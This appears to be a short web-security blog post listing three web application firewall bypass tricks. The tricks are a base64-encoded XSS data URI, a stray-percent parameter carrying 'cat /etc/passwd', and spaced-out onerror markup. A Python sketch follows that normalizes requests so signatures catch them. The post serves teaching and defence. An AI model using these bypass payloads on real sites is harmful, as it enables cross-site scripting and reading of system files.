WAF Bypass Checklist

Generic techniques

  • Base64-encode the payload so the WAF does not see the literal markup (/?q=<data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=_)
  • ASPX removes a % that is not followed by two hex characters, so the WAF and the application can end up reading different strings (https://site.com/index.php?%file=cat /etc/passwd)
  • We can use spaces, for example around =, to fool a WAF (<Img src = x onerror = "javascript: window.onerror = alert; throw XSS">)
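
Seen from the rule-writing side, all three items work because the WAF matches the raw bytes while the backend interprets a decoded form. The sketch below is an added example, not code from the original post: it canonicalizes a request string before matching. The three-rule signature set, the function names and the sample requests are assumptions constructed for illustration.

```python
import base64
import re
from urllib.parse import unquote

# Hypothetical three-rule signature set, for illustration only.
SIGNATURES = [re.compile(p, re.I) for p in (
    r"<script\b",
    r"\bonerror=",
    r"[?&]file=[^&]*/etc/passwd",
)]
STRAY_PERCENT = re.compile(r"%(?![0-9A-Fa-f]{2})")
DATA_URI = re.compile(r"data:[\w/+.-]*;base64,([A-Za-z0-9+/]+={0,2})", re.I)


def _expand_data_uri(match):
    """Replace a base64 data: URI with its decoded body, if it decodes."""
    try:
        body = base64.b64decode(match.group(1), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return match.group(0)
    return body.decode("utf-8", "replace")


def normalize(raw):
    """Canonicalize a request string before signature matching."""
    s = STRAY_PERCENT.sub("", raw)      # drop % not followed by two hex digits
    s = unquote(s)                      # ordinary percent-decoding
    s = DATA_URI.sub(_expand_data_uri, s)
    return re.sub(r"\s*=\s*", "=", s)   # collapse whitespace around '='


def flagged(text):
    return any(sig.search(text) for sig in SIGNATURES)


def inspect(raw):
    """Return (match on raw input, match after normalization)."""
    return flagged(raw), flagged(normalize(raw))


# Constructed samples mirroring the three bullets, plus one benign request.
SAMPLES = [
    "/?q=data:text/html;base64," + base64.b64encode(b"<script>alert(1)</script>").decode(),
    "/index.php?%file=cat /etc/passwd",
    '<Img src = x onerror = "alert(1)">',
    "/search?q=100% organic",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(inspect(sample), sample)
```

Each of the first three samples is missed on the raw string and caught after normalization; the benign request is flagged in neither pass.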
Thexssrat